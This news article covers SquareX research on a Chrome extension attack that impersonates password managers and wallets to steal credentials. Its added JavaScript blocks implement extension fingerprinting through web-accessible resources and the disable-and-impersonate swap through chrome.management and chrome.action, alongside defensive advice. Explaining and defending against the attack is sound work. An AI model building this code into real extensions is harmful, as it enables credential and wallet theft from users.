Cyber Security News

New Polymorphic Attack That Mimics Any Chrome Extension Installed On The Browser

SquareX’s research team has recently uncovered a sophisticated browser attack technique that allows malicious extensions to impersonate any extension installed on a victim’s browser.

This newly discovered “polymorphic extension attack” creates pixel-perfect replicas of legitimate extensions’ icons, HTML popups, and workflows, making it nearly impossible for users to distinguish them from authentic extensions.

The attack even temporarily disables the legitimate extension, creating a seamless deception that tricks users into providing sensitive credentials to what they believe is their trusted tool.

The attack exploits the human tendency to rely on visual cues for verification, particularly the extension icons on the pinned tab bar. When users interact with these icons, they assume they’re engaging with legitimate extensions.

However, the polymorphic extension can silently replace these visual indicators at precisely timed moments, creating a perfect illusion that leads to credential theft.

What makes this attack particularly dangerous is that it targets high-value extensions such as password managers, cryptocurrency wallets, banking applications, and productivity tools.

Once a victim is deceived into entering credentials, attackers gain access to the sensitive information and financial assets stored within these services.

For example, if a password manager's master credentials are captured, attackers obtain access to the victim's entire credential vault, and through it to every associated service or account.

SquareX's analysts found that the technical implementation involves multiple phases, each demonstrating deliberate evasion techniques.

Initially, attackers publish their malicious extension disguised as a useful tool, such as an AI marketing assistant.

After installation, the extension functions as promised to avoid raising suspicion while monitoring for high-value target extensions on the user’s browser.

To identify target extensions, the attacker either queries the chrome.management API or, more stealthily, probes the targets' web-accessible resources.

Installed extensions (Source – Medium)

The latter approach injects a script into webpages that attempts to load resources at known chrome-extension:// URLs (for example a logo PNG that the target extension exposes as a web-accessible resource); a successful load reveals that the extension is installed without ever calling a management API.
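The two enumeration methods described above, as an added illustration that is not SquareX's code: a pure function builds the probe URLs for a constructed fingerprint table (the extension IDs and resource paths are placeholders, not real extensions), a browser-side probe loads each one as an image, and a second helper shows the noisier chrome.management route. Everything except the image probe runs in plain Node.

```javascript
// Constructed fingerprint table. IDs and paths are placeholders for illustration;
// a real attacker would use the IDs and web-accessible paths of the extensions they target.
const FINGERPRINTS = [
  { name: "Example Password Manager", id: "abcdefghijklmnopabcdefghijklmnop", resource: "images/logo.png" },
  { name: "Example Crypto Wallet",   id: "ponmlkjihgfedcbaponmlkjihgfedcba", resource: "assets/icon128.png" },
  { name: "Example Bank Helper",     id: "aaaabbbbccccddddeeeeffffgggghhhh", resource: "img/brand.png" },
];

// Web-accessible resources live at chrome-extension://<id>/<path>.
function probeUrl(id, resource) {
  return `chrome-extension://${id}/${resource}`;
}

// Map each fingerprint to the URL a page would try to load.
function fingerprintUrls(fingerprints) {
  return fingerprints.map(fp => ({ name: fp.name, url: probeUrl(fp.id, fp.resource) }));
}

// Given probe results keyed by URL (true = resource loaded), return the names detected.
function matchResults(fingerprints, results) {
  return fingerprintUrls(fingerprints)
    .filter(({ url }) => results[url] === true)
    .map(({ name }) => name);
}

// Browser-only probe: an <img> fires onload only if the extension is installed,
// enabled, and exposes that path as a web-accessible resource to this origin.
function imageProbe(url) {
  return new Promise(resolve => {
    const img = new Image();
    img.onload = () => resolve(true);
    img.onerror = () => resolve(false);
    img.src = url;
  });
}

// Stealthy route: run the probes from an injected page script, no extension API needed.
async function detectViaResources(fingerprints, probe = imageProbe) {
  const results = {};
  for (const { url } of fingerprintUrls(fingerprints)) {
    results[url] = await probe(url);
  }
  return matchResults(fingerprints, results);
}

// Noisier route: chrome.management.getAll() returns ExtensionInfo objects with id and
// enabled fields, but requires the "management" permission in the manifest.
function detectViaManagement(extensionInfos, fingerprints) {
  const enabledIds = new Set(extensionInfos.filter(e => e.enabled).map(e => e.id));
  return fingerprints.filter(fp => enabledIds.has(fp.id)).map(fp => fp.name);
}

// Stand-alone demo with a fake probe that "finds" only the wallet (constructed data).
const fakeProbe = url => Promise.resolve(url.includes(FINGERPRINTS[1].id));
detectViaResources(FINGERPRINTS, fakeProbe).then(found => console.log("resource probe:", found));
console.log("management:", detectViaManagement(
  [{ id: FINGERPRINTS[0].id, enabled: true }, { id: FINGERPRINTS[2].id, enabled: false }],
  FINGERPRINTS));
```

The resource probe only works against paths the target lists under web_accessible_resources. In Manifest V3 an extension can set "use_dynamic_url": true on that entry so the URL changes per session, and can restrict "matches" to the origins that genuinely need the file; both measures defeat this fingerprint. Extension authors targeted by this attack should check their own manifests for broadly exposed static logos.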

Technical Implementation

The core of this attack lies in its ability to dynamically transform its appearance and behavior.

When a trigger occurs, such as the user visiting a login page for the target service, the polymorphic extension temporarily disables the legitimate extension through the chrome.management API, then changes its own toolbar icon, tooltip, and popup to match the target.

Visual transformation process from the original extension to the impersonated one (Source – Medium)

When users click on what appears to be their password manager, they are actually interacting with the malicious extension's look-alike popup, which captures their master credentials and secret keys before re-enabling the legitimate extension and restoring its own original appearance, so the victim sees no gap.

This attack is particularly concerning as it exploits legitimate Chrome functionality and uses permissions classified as medium risk, making it difficult to detect through standard security measures.

The APIs used – activeTab, scripting, and chrome.management – are commonly used by legitimate extensions, allowing the malicious code to blend in with normal browser operations.
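The swap-and-restore sequence the two preceding sections describe, as an added illustration written by the editor rather than SquareX's code. It uses the real chrome.management and chrome.action method names but separates the decision (a pure function that returns the ordered API calls) from execution, so it can run and be checked in Node against a fake chrome object. The target descriptor, extension ID, URL pattern, and icon paths are constructed placeholders; no credential-capturing popup is included. A small manifest triage helper at the end shows the defensive check the last paragraph implies.

```javascript
// Constructed target descriptor. The ID is a placeholder, not a real extension.
const TARGET = {
  id: "pmpmpmpmpmpmpmpmpmpmpmpmpmpmpmpm",
  name: "Example Password Manager",
  icon: "icons/lookalike-128.png",   // attacker-bundled copy of the target's icon
  popup: "popups/lookalike.html",    // pixel-matched HTML popup
  loginPattern: /^https:\/\/(accounts|login)\.example\.com\//,
};

// Decide whether to swap on this page and, if so, which API calls to make, in order.
// Returns [] when the target is not installed/enabled or the URL does not match.
function planSwap(target, installedExtensions, pageUrl) {
  if (!target.loginPattern.test(pageUrl)) return [];
  const present = installedExtensions.some(e => e.id === target.id && e.enabled);
  if (!present) return [];
  return [
    { api: "management.setEnabled", args: [target.id, false] },        // silence the real one
    { api: "action.setIcon",        args: [{ path: target.icon }] },   // borrow its icon
    { api: "action.setTitle",       args: [{ title: target.name }] },  // and its tooltip
    { api: "action.setPopup",       args: [{ popup: target.popup }] }, // and its popup
  ];
}

// Undo the swap once the popup has been used: restore own UI, re-enable the target.
function planRestore(target, original) {
  return [
    { api: "action.setPopup",       args: [{ popup: original.popup }] },
    { api: "action.setTitle",       args: [{ title: original.title }] },
    { api: "action.setIcon",        args: [{ path: original.icon }] },
    { api: "management.setEnabled", args: [target.id, true] },
  ];
}

// Apply a plan against a chrome-like object, e.g. chrome.management.setEnabled(id, false).
async function execute(chromeApi, plan) {
  for (const step of plan) {
    const [ns, fn] = step.api.split(".");
    await chromeApi[ns][fn](...step.args);
  }
  return plan.length;
}

// Fake chrome object for running the demo outside a browser; records every call.
function makeFakeChrome() {
  const log = [];
  const record = api => async (...args) => { log.push({ api, args }); };
  return {
    log,
    management: { setEnabled: record("management.setEnabled") },
    action: {
      setIcon: record("action.setIcon"),
      setTitle: record("action.setTitle"),
      setPopup: record("action.setPopup"),
    },
  };
}

// Defensive triage: does this manifest request the combination the article calls out?
// Input is a parsed manifest.json; output is the list of reasons it deserves review.
function manifestRiskFlags(manifest) {
  const perms = new Set(manifest.permissions || []);
  const flags = [];
  if (perms.has("management")) flags.push("can enable/disable other extensions (management)");
  if (perms.has("scripting") || perms.has("activeTab")) flags.push("can inject page scripts (scripting/activeTab)");
  if (manifest.action) flags.push("has a toolbar action whose icon/popup can be changed at runtime");
  return flags.length === 3 ? flags : [];
}

// Stand-alone demo with constructed data.
const chromeApi = makeFakeChrome();
const installed = [{ id: TARGET.id, enabled: true }];
execute(chromeApi, planSwap(TARGET, installed, "https://login.example.com/signin"))
  .then(() => execute(chromeApi, planRestore(TARGET, { icon: "icons/own-128.png", title: "AI Marketing Assistant", popup: "popup.html" })))
  .then(() => console.log(chromeApi.log.map(s => s.api)));
console.log(manifestRiskFlags({ permissions: ["management", "scripting", "activeTab"], action: { default_popup: "popup.html" } }));
```

Two caveats for anyone reproducing this. Chrome's documentation for chrome.management.setEnabled notes that it may require a user gesture and may show a native confirmation when an extension is re-enabled, so the restore step is not guaranteed to be silent. On the detection side, an enterprise monitoring extension can subscribe to chrome.management.onDisabled and chrome.management.onEnabled; a password manager being disabled and re-enabled within seconds while a login page is open is exactly the pattern this attack produces.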


Tushar Subhra Dutta

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
